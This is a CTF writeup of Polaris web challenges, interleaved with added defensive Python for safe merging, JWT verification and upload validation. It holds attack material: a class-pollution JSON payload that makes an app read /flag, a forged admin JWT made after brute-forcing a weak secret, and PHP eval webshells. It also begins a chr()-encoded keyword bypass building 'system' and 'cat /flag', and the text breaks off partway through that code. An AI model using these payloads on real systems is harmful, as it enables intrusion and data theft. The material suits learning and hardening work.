Polaris CTF web challenge writeups: how to analyze and solve them in depth?
A writeup of some Polaris CTF web challenges that even a complete beginner can follow
ez_python
Challenge

from flask import Flask, request
import json

app = Flask(__name__)

# Recursive merge of a JSON object into an arbitrary Python object. When dst
# is not a mapping, keys turn into attribute writes via setattr(), which is
# what lets request data reach attributes of the global instance below.
def merge(src, dst):
    for k, v in src.items():
        if hasattr(dst, '__getitem__'):
            if dst.get(k) and type(v) == dict:
                merge(v, dst.get(k))
            else:
                dst[k] = v
        elif hasattr(dst, k) and type(v) == dict:
            merge(v, getattr(dst, k))
        else:
            setattr(dst, k, v)

class Config:
    def __init__(self):
        self.filename = "app.py"

class Polaris:
    def __init__(self):
        self.config = Config()

instance = Polaris()

@app.route('/', methods=['GET', 'POST'])
def index():
    if request.data:
        # Untrusted JSON is merged straight into the global instance
        merge(json.loads(request.data), instance)
    return "Welcome to Polaris CTF"

@app.route('/read')
def read():
    # Opens whatever path instance.config.filename currently holds
    return open(instance.config.filename).read()

@app.route('/src')
def src():
    return open(__file__).read()

if __name__ == '__main__':
    app.run(host='0.0.0.0', port=5000, debug=False)
Solution

@app.route('/read')
def read():
    return open(instance.config.filename).read()

The goal is to pollute instance.config.filename so that it points at the flag file:
{"config": {"filename": "/flag"}}
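To make the pollution path concrete, and to show what a fix looks like, here is an added example that is not part of the writeup or of the challenge code. merge_unsafe reproduces the challenge's merge() so the comparison is honest; merge_safe, ALLOWED_FILES, polluted_config and hardened_filename are my own names and assumptions. The hardened variant only merges dicts into dicts (so JSON can never reach an attribute of a live object), refuses underscore-prefixed keys, and checks the resulting filename against an allowlist before anything is opened.

```python
import json


class Config:
    def __init__(self):
        self.filename = "app.py"


class Polaris:
    def __init__(self):
        self.config = Config()


def merge_unsafe(src, dst):
    # Same logic as the challenge's merge(): when dst is not a mapping the
    # code falls through to setattr(), so JSON keys become attribute writes.
    for k, v in src.items():
        if hasattr(dst, '__getitem__'):
            if dst.get(k) and type(v) == dict:
                merge_unsafe(v, dst.get(k))
            else:
                dst[k] = v
        elif hasattr(dst, k) and type(v) == dict:
            merge_unsafe(v, getattr(dst, k))
        else:
            setattr(dst, k, v)


# Constructed allowlist of files the /read endpoint may serve.
ALLOWED_FILES = {"app.py", "README.md"}


def merge_safe(src, dst):
    """Hardened merge (assumption, not the challenge's): dict into dict only."""
    if not isinstance(dst, dict):
        raise TypeError("merge target must be a dict")
    for k, v in src.items():
        if not isinstance(k, str) or k.startswith("_"):
            raise ValueError(f"rejected key: {k!r}")
        if isinstance(v, dict):
            target = dst.setdefault(k, {})
            if not isinstance(target, dict):
                raise TypeError(f"cannot merge a mapping into {k!r}")
            merge_safe(v, target)
        else:
            dst[k] = v


def polluted_config(payload: str) -> dict:
    """What the challenge's merge leaves behind on instance.config."""
    inst = Polaris()
    merge_unsafe(json.loads(payload), inst)
    return dict(vars(inst.config))


def hardened_filename(payload: str) -> str:
    """Same request handled with merge_safe plus an allowlist check."""
    settings = {"config": {"filename": "app.py"}}
    try:
        merge_safe(json.loads(payload), settings)
    except (TypeError, ValueError):
        return "rejected"
    config = settings.get("config")
    if not isinstance(config, dict):
        return "rejected"
    name = config.get("filename")
    return name if name in ALLOWED_FILES else "rejected"


if __name__ == "__main__":
    print(polluted_config('{"config": {"filename": "/flag", "debug": true}}'))
    print(hardened_filename('{"config": {"filename": "/flag"}}'))
```

Note that the allowlist is what actually closes the hole: a merge that only touches dicts still lets the client choose the filename, and any design where request data picks a path to open needs that final check regardless of how the merge is written.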
only real
Challenge
Solution
The page source leaks a username and password:
<!-- xmuser/123456 -->
Capturing the login request reveals a token, and after logging in no actions are permitted, so the guess is that the token can be forged:
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxIiwicm9sZSI6InVzZXIiLCJleHAiOjE3NzQ5NDU5MjJ9.oklvvL_iH2xPICwCpsImEtoYgHdXe8y6GXNsbnsB-T4
Brute-forcing the signing secret gives key=cdef.
Changing the token's role to xmuser still permits no actions.
Changing role=admin makes the actions available (alternatively, editing the front-end code to delete the disabled attribute also works):
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE3NzQ5NDU5MjIsInJvbGUiOiJhZG1pbiIsInN1YiI6IjEifQ.w6j2pDZ0eThtl-bUz0HBzRSxcKRT06J-kYAx6Ysu6Pw
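The two tokens above differ only in their payload and signature, and the signature was only forgeable because the secret was four characters long. An HS256 verifier that pins the algorithm, compares the HMAC in constant time, enforces exp and sits on a secret of proper length is the defence. The following is an added example, not code from the writeup or the challenge: decode_unverified, sign_hs256, verify_hs256, swap_payload, secret_is_strong and the 40-byte demo key are my own names and values; the two token strings are copied from the writeup solely to decode their payloads.

```python
import base64
import hashlib
import hmac
import json
from typing import Optional

# Tokens quoted in the writeup (decoded here only to read the claims).
TOKEN_USER = ("eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
              "eyJzdWIiOiIxIiwicm9sZSI6InVzZXIiLCJleHAiOjE3NzQ5NDU5MjJ9."
              "oklvvL_iH2xPICwCpsImEtoYgHdXe8y6GXNsbnsB-T4")
TOKEN_ADMIN = ("eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9."
               "eyJleHAiOjE3NzQ5NDU5MjIsInJvbGUiOiJhZG1pbiIsInN1YiI6IjEifQ."
               "w6j2pDZ0eThtl-bUz0HBzRSxcKRT06J-kYAx6Ysu6Pw")


def _b64url_decode(part: str) -> bytes:
    return base64.urlsafe_b64decode(part + "=" * (-len(part) % 4))


def _b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def decode_unverified(token: str) -> dict:
    """Reads the claims without checking anything: fine for inspection, never for authorization."""
    return json.loads(_b64url_decode(token.split(".")[1]))


def sign_hs256(claims: dict, key: bytes) -> str:
    header = _b64url_encode(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    payload = _b64url_encode(json.dumps(claims, separators=(",", ":")).encode())
    sig = hmac.new(key, f"{header}.{payload}".encode("ascii"), hashlib.sha256).digest()
    return f"{header}.{payload}.{_b64url_encode(sig)}"


def verify_hs256(token: str, key: bytes, now: int) -> Optional[dict]:
    """Returns the claims only if the HS256 signature is valid and exp has not passed."""
    parts = token.split(".")
    if len(parts) != 3:
        return None
    header_b64, payload_b64, sig_b64 = parts
    try:
        header = json.loads(_b64url_decode(header_b64))
        sig = _b64url_decode(sig_b64)
    except ValueError:
        return None
    # Pin the algorithm server-side; the token must never choose it ("alg": "none").
    if not isinstance(header, dict) or header.get("alg") != "HS256":
        return None
    expected = hmac.new(key, f"{header_b64}.{payload_b64}".encode("ascii"), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, sig):
        return None
    try:
        claims = json.loads(_b64url_decode(payload_b64))
    except ValueError:
        return None
    exp = claims.get("exp") if isinstance(claims, dict) else None
    if not isinstance(exp, int) or now >= exp:
        return None
    return claims


def swap_payload(token: str, claims: dict) -> str:
    """Rewrites the payload but keeps the old signature: the tampering verify_hs256 must catch."""
    header_b64, _, sig_b64 = token.split(".")
    payload = _b64url_encode(json.dumps(claims, separators=(",", ":")).encode())
    return f"{header_b64}.{payload}.{sig_b64}"


def secret_is_strong(key: bytes) -> bool:
    # HMAC-SHA256 keys should be at least 32 random bytes; a four-character
    # secret like the one recovered in the writeup is within offline guessing range.
    return len(key) >= 32


if __name__ == "__main__":
    print(decode_unverified(TOKEN_USER), decode_unverified(TOKEN_ADMIN))
    print(secret_is_strong(b"cdef"))
```

The server-side lesson is the pairing of verify_hs256 with a strong secret: the role claim is only as trustworthy as the signature over it, and the signature is only as trustworthy as the secret's resistance to guessing.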
Uploading a plain 1.php is blocked as expected, so try a 1.jpg image webshell:
#define width 1337
#define height 1337
<?php eval($_POST['cmd']); ?>
<script language="php">eval($_POST[1]);</script>
Both are rejected with a message saying the file content contains forbidden keywords.
Method 1: chr bypass
Attempt to bypass the keyword restriction:
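The filter that produced that message is a keyword blocklist on the file body, and blocklists of that kind are easy to slip past with encoding tricks such as the chr() approach used later in this writeup. A structural check does better: decide by file type, not by substrings. Below is an added example, not code from the writeup or the challenge; BLOCKED_KEYWORDS is a constructed guess at the style of filter used (the real list is not on the page), and is_wellformed_jpeg, accept_upload and the sample byte strings are my own. The "good" sample is a hand-built JPEG skeleton (SOI, APP0, SOS, a few scan bytes, EOI) and the "polyglot" sample is a text body in the style of the upload above with the PHP reduced to a harmless fragment.

```python
import os
import secrets

# Constructed guess at the challenge's blocklist style.
BLOCKED_KEYWORDS = ("<?php", "<script", "eval", "system", "passthru", "$_post", "$_get")


def blocklist_allows(data: bytes) -> bool:
    """The fragile check: substring matching on the raw body."""
    text = data.decode("latin-1").lower()
    return not any(word in text for word in BLOCKED_KEYWORDS)


def is_wellformed_jpeg(data: bytes) -> bool:
    """Structural check: SOI, a chain of length-prefixed segments, then SOS, with EOI at the end."""
    if len(data) < 4 or data[:2] != b"\xff\xd8" or data[-2:] != b"\xff\xd9":
        return False
    pos = 2
    while pos + 4 <= len(data):
        if data[pos] != 0xFF:
            return False                      # garbage between segments
        marker = data[pos + 1]
        if marker == 0xDA:                    # SOS: scan data follows up to EOI
            return True
        if marker == 0xD9 or 0xD0 <= marker <= 0xD7 or marker == 0x01:
            return False                      # EOI / RSTn / TEM before any scan
        length = int.from_bytes(data[pos + 2:pos + 4], "big")
        if length < 2 or pos + 2 + length > len(data):
            return False
        pos += 2 + length
    return False


def accept_upload(filename: str, data: bytes) -> dict:
    """Extension allowlist, structural image check, random stored name."""
    ext = os.path.splitext(filename)[1].lower()
    if ext not in {".jpg", ".jpeg"}:
        return {"ok": False, "reason": "extension not allowed"}
    if not is_wellformed_jpeg(data):
        return {"ok": False, "reason": "not a well-formed JPEG"}
    # The stored name is random, so nothing about the path is user-chosen.
    return {"ok": True, "stored_as": secrets.token_hex(16) + ext}


# Constructed sample: minimal JPEG skeleton (SOI, APP0/JFIF, SOS, scan bytes, EOI).
GOOD_JPEG = (
    b"\xff\xd8"
    + b"\xff\xe0" + (16).to_bytes(2, "big") + b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    + b"\xff\xda" + (8).to_bytes(2, "big") + b"\x01\x01\x00\x00\x3f\x00"
    + b"\x00\x11\x22"
    + b"\xff\xd9"
)
# Constructed sample: text polyglot in the style of the upload above, PHP reduced to a fragment.
POLYGLOT_UPLOAD = b"#define width 1337\n#define height 1337\n<?= $f=chr(115).chr(121); ?>\n"
# Constructed sample: the plain form the blocklist does catch.
PLAIN_PHP = b"<?php eval($_POST['cmd']); ?>"


if __name__ == "__main__":
    print(blocklist_allows(PLAIN_PHP), blocklist_allows(POLYGLOT_UPLOAD))
    print(accept_upload("1.jpg", POLYGLOT_UPLOAD), accept_upload("1.jpg", GOOD_JPEG))
```

The difference shows in the results: the blocklist passes the polyglot because none of its substrings appear literally, while the structural check rejects it because a JPEG does not start with "#define". In a real deployment the upload directory should additionally be served without script execution, so that even a file that fools the parser is only ever delivered as bytes.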
<?=
$func=chr(115).chr(121).chr(115).chr(116).chr(101).chr(109);
$cmd='';
$cmd_chars=[99, 97, 116, 32, 47, 102, 108, 97, 103];
foreach($cmd_chars as $ascii){
